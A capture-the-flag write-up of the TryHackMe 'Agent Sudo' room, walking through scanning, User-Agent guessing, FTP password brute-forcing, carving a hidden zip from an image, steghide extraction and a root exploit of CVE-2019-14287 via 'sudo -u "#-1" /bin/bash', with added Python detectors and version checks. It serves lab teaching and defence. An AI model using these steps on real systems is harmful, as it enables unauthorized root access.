Try Hack Me - Agent Sudo

You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

Run a scan with the ever-useful nmap:

kali@kali:~/ctf/thm/agent_sudo$ sudo nmap -Pn -sV 10.10.11.35
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 22:55 UTC
Nmap scan report for 10.10.11.35
Host is up (1.5s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.82 seconds

Accessing the web page gives a hint:

Dear agents,

Use your own codename as user-agent to access the site.

From, Agent R

After trying different User-Agent headers on HTTP requests, I tried the single letter R.

What are you doing! Are you one of the 25 employees? If not, I going to report this incident

Trying the other letters of the alphabet leads to a hit on C, which redirects to another page:

Attention chris,

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!

From,
Agent R
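
Seen from the server side, the enumeration above (one request per candidate User-Agent, all from the same client within seconds) is easy to spot in the access log. As an added example that is not part of this writeup, here is a small Python detector over constructed Apache combined-format log lines: it flags any client that presents many distinct User-Agent strings within a short window. The threshold and window size are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" format: ip ident user [ts] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "ua": m.group("ua"),
            "status": int(m.group("status"))}


def flag_user_agent_cycling(lines, min_distinct=8, window_seconds=60):
    """Return the client IPs that sent at least `min_distinct` different
    User-Agent strings inside any `window_seconds` span (thresholds are assumptions)."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append((rec["ts"], rec["ua"]))
    flagged = []
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # shrink the window from the left until it spans <= window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = {ua for _, ua in events[start:end + 1]}
            if len(distinct) >= min_distinct:
                flagged.append(ip)
                break
    return sorted(flagged)


def sample_log():
    """Constructed sample: one client cycles A..Z as its User-Agent, another browses normally."""
    lines = []
    for i, letter in enumerate("ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
        lines.append('10.0.0.5 - - [02/Oct/2020:22:58:%02d +0000] '
                     '"GET / HTTP/1.1" 200 218 "-" "%s"' % (i, letter))
    for i in range(5):
        lines.append('10.0.0.9 - - [02/Oct/2020:22:58:%02d +0000] '
                     '"GET / HTTP/1.1" 200 218 "-" "Mozilla/5.0 (X11; Linux x86_64)"' % (i * 10))
    return lines


if __name__ == "__main__":
    print("clients cycling User-Agents:", flag_user_agent_cycling(sample_log()))
```

The same sliding-window logic works on real access logs read line by line; only the two thresholds need adjusting.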

Now we have a possible username, chris, and can try to brute-force a weak password. We get a hit for the FTP credentials and download a couple of images, cutie.png and cute-alien.jpg.

Viewing cutie.png in a hex editor, we stumble across what looks like a filename: To_agentR.txt. You can concatenate files together, and some image formats will still work just fine when concatenated with something like a zip file. The zip format's local file header starts with the magic number 0x04034b50 (the bytes 50 4b 03 04, "PK"), and we can indeed find that in this image file:

00008700: 6082 504b 0304 3303 0100 6300 a6a3 5d4f  `.PK..3...c...]O
00008710: 0000 0000 6200 0000 5600 0000 0d00 0b00  ....b...V.......
00008720: 546f 5f61 6765 6e74 522e 7478 7401 9907  To_agentR.txt...
00008730: 0002 0041 4501 0800 4673 cae7 1457 9045  ...AE...Fs...W.E
00008740: 67aa 61c4 cf3a f94e 649f 827e 5964 ce57  g.a..:.Nd..~Yd.W
00008750: 5c5f 7a23 9c48 fb99 2c8e a8cb ffe5 1d03  \_z#.H..,.......
00008760: 755e 0ca8 61a5 a3dc babf a618 784b 8507  u^..a.......xK..
00008770: 5f0e f476 c6da 8261 805b d0a4 309d b388  _..v...a.[..0...
00008780: 35ad 3261 3e3d c5d7 e87c 0f91 c0b5 e64e  5.2a>=...|.....N
00008790: 4969 f382 486c b676 7ae6 504b 0102 3f03  Ii..Hl.vz.PK..?.
000087a0: 3303 0100 6300 a6a3 5d4f 0000 0000 6200  3...c...]O....b.
000087b0: 0000 5600 0000 0d00 2f00 0000 0000 0000  ..V...../.......
000087c0: 2080 a481 0000 0000 546f 5f61 6765 6e74   .......To_agent
000087d0: 522e 7478 740a 0020 0000 0000 0001 0018  R.txt.. ........
000087e0: 0080 4577 7754 8ed5 0100 65da d354 8ed5  ..EwwT....e..T..
000087f0: 0100 65da d354 8ed5 0101 9907 0002 0041  ..e..T.........A
00008800: 4501 0800 504b 0506 0000 0000 0100 0100  E...PK..........
00008810: 6a00 0000 9800 0000 0000                 j.........

You can't just rename the file, or at least it didn't work for me:

kali@kali:~/ctf/thm/agent_sudo$ cp cutie.png cutie.zip
kali@kali:~/ctf/thm/agent_sudo$ unzip cutie.zip 
Archive:  cutie.zip
warning [cutie.zip]:  34562 extra bytes at beginning or within zipfile
  (attempting to process anyway)
   skipping: To_agentR.txt           need PK compat. v5.1 (can do v4.6)

But you can use the dd utility to copy the part we're interested in to its own zip file:

kali@kali:~/ctf/thm/agent_sudo$ dd if=cutie.png of=cutie.zip ibs=1 skip=34562
280+0 records in
0+1 records out
280 bytes copied, 0.001117 s, 251 kB/s
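
As an added example (not part of the original writeup), here is a small Python parser that does what the hex inspection and the dd step above do by hand: it finds the first local file header signature (PK\x03\x04, the 0x04034b50 magic read little-endian), decodes its fields, and uses the end-of-central-directory record to find where the archive ends, so the exact byte range can be carved. Run on the header bytes transcribed from the hex dump above, it also shows why plain unzip refused the renamed file: the version-needed byte is 0x33 = 51, i.e. 5.1, and the compression method is 99 with a 0x9901 "AE" extra field, which is WinZip AES encryption. The PNG-plus-zip it carves is constructed inside the block.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"   # 0x04034b50 as it appears in the file (little-endian)
EOCD_SIG = b"PK\x05\x06"    # end of central directory record


def parse_local_header(data, off):
    """Decode the 30-byte local file header at data[off] plus its file name."""
    if data[off:off + 4] != LOCAL_SIG:
        raise ValueError("no local file header at offset %d" % off)
    (ver, flags, method, _mtime, _mdate, _crc, csize, usize,
     nlen, elen) = struct.unpack_from("<HHHHHIIIHH", data, off + 4)
    ver &= 0xFF  # low byte is the version needed to extract (51 -> 5.1)
    return {
        "offset": off,
        "version_needed": "%d.%d" % (ver // 10, ver % 10),
        "encrypted": bool(flags & 1),
        "method": method,        # 8 = deflate, 99 = WinZip AES
        "name": data[off + 30:off + 30 + nlen].decode("cp437", "replace"),
        "compressed_size": csize,
        "uncompressed_size": usize,
        "data_offset": off + 30 + nlen + elen,
    }


def find_embedded_zip(data):
    """Return (start, end) of a zip archive appended to data, or None."""
    start = data.find(LOCAL_SIG)
    eocd = data.rfind(EOCD_SIG)
    if start < 0 or eocd < start:
        return None
    comment_len = struct.unpack_from("<H", data, eocd + 20)[0]
    return start, eocd + 22 + comment_len  # EOCD is 22 bytes plus its comment


def carve_zip(data):
    """The dd step from the writeup, done in memory: slice out just the archive."""
    span = find_embedded_zip(data)
    return None if span is None else data[span[0]:span[1]]


# Local header + file name + extra field transcribed from the hex dump above (offset 0x8702).
PAGE_LOCAL_HEADER = (
    b"PK\x03\x04" b"\x33\x03" b"\x01\x00" b"\x63\x00" b"\xa6\xa3" b"\x5d\x4f"
    b"\x00\x00\x00\x00" b"\x62\x00\x00\x00" b"\x56\x00\x00\x00" b"\x0d\x00" b"\x0b\x00"
    b"To_agentR.txt"
    b"\x01\x99\x07\x00" b"\x02\x00" b"AE" b"\x01" b"\x08\x00"   # 0x9901 AES extra field
)


def build_sample():
    """Constructed test input: a fake PNG tail followed by a real (unencrypted) zip."""
    png_like = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64 + b"IEND\xaeB`\x82"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("To_agentR.txt", "constructed sample message\n")
    return png_like + buf.getvalue()


if __name__ == "__main__":
    print("page header:", parse_local_header(PAGE_LOCAL_HEADER, 0))
    sample = build_sample()
    print("embedded zip at", find_embedded_zip(sample))
    with zipfile.ZipFile(io.BytesIO(carve_zip(sample))) as z:
        print(z.read("To_agentR.txt"))
```

To use it on the real file, read cutie.png into bytes and write the result of carve_zip to cutie.zip; the start offset it reports is the 34562 passed to dd above, and the end comes from the EOCD record rather than from guessing.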

The zip file has a password as well. Using a hint from the CTF, we know it needs a 5-letter password. After trying a few random things, we hit on a word that follows the theme, *****. We got lucky by using the CTF itself as a clue.

kali@kali:~/ctf/thm/agent_sudo$ more To_agentR.txt 
Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

By,
Agent R

That string looks encoded, not rot13, so maybe base64?

>>> import base64
>>> base64.b64decode('QXJlYTUx')
b'Area51'

There we go: probably a password, and we have two images. Steghide is a favorite in CTFs that have some basic steganography, so let's try it on the JPG.

kali@kali:~/ctf/thm/agent_sudo$ steghide extract -sf cute-alien.jpg 
Enter passphrase: 
wrote extracted data to "message.txt".
Hi james,

Glad you find this message. Your login password is ***********!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris

With that we can log in to the box with SSH and discover another image to download. What is the name of the incident in the image? A Google image search helps us figure out this was known as the Roswell alien autopsy.

Running linpeas on the system points out that the version of sudo installed is 1.8.21p2. Since the name of this CTF is "Agent Sudo", one imagines the privilege escalation we're looking for involves sudo. The corresponding CVE is CVE-2019-14287.

[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.21p2
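
The defender's side of this finding is a version check. CVE-2019-14287 was fixed in sudo 1.8.28, and it only matters for sudoers rules that let a user run commands as any user except root, the (ALL, !root) shape, because the bug let a runas user ID of -1 (or 4294967295) be treated as uid 0. As an added example that is not part of this writeup, the Python below parses a version string like the one linpeas printed, compares it against the fixed release, and applies a simple heuristic to sudoers lines; the sudoers line used is constructed, not taken from the room.

```python
import re
import subprocess

FIXED_VERSION = (1, 8, 28, 0)   # CVE-2019-14287 was fixed in sudo 1.8.28


def parse_sudo_version(text):
    """Turn '1.8.21p2' (or the full `sudo --version` banner) into a comparable tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError("no sudo version found in: %r" % text)
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def vulnerable_to_cve_2019_14287(version_text):
    """True when the sudo version is older than the 1.8.28 fix."""
    return parse_sudo_version(version_text) < FIXED_VERSION


def runas_excludes_root(sudoers_line):
    """Heuristic: True when a rule grants runas ALL with root excluded,
    e.g. 'james ALL=(ALL, !root) /bin/bash' (constructed sample rule).
    That is the rule shape the CVE needs; other sudoers syntax is not handled."""
    return re.search(r"\(\s*ALL\s*,\s*!root\s*\)", sudoers_line) is not None


def check_local_sudo():
    """Run `sudo --version` on this host and report whether the fix is missing."""
    banner = subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout
    return vulnerable_to_cve_2019_14287(banner)


if __name__ == "__main__":
    print("linpeas output ->", vulnerable_to_cve_2019_14287("Sudo version 1.8.21p2"))
    print("local host vulnerable:", check_local_sudo())
```

The fix is simply to update sudo (as root.txt below also advises); the sudoers heuristic is there to prioritise which hosts with an old sudo actually expose the bug.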

To exploit this vulnerability, all we need to do is run sudo with a user ID of -1.

james@agent-sudo:~$ sudo -u "#-1" /bin/bash
root@agent-sudo:~# cd /root
root@agent-sudo:/root# ls -la
total 32
drwx------  4 root root 4096 Oct 29  2019 .
drwxr-xr-x 24 root root 4096 Oct 29  2019 ..
-rw-------  1 root root 1952 Oct 29  2019 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Oct 29  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  197 Oct 29  2019 root.txt
drwx------  2 root root 4096 Oct 29  2019 .ssh
root@agent-sudo:/root# cat root.txt
To Mr.hacker,

Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine. 

Your flag is 
********************************

By,
DesKel a.k.a Agent R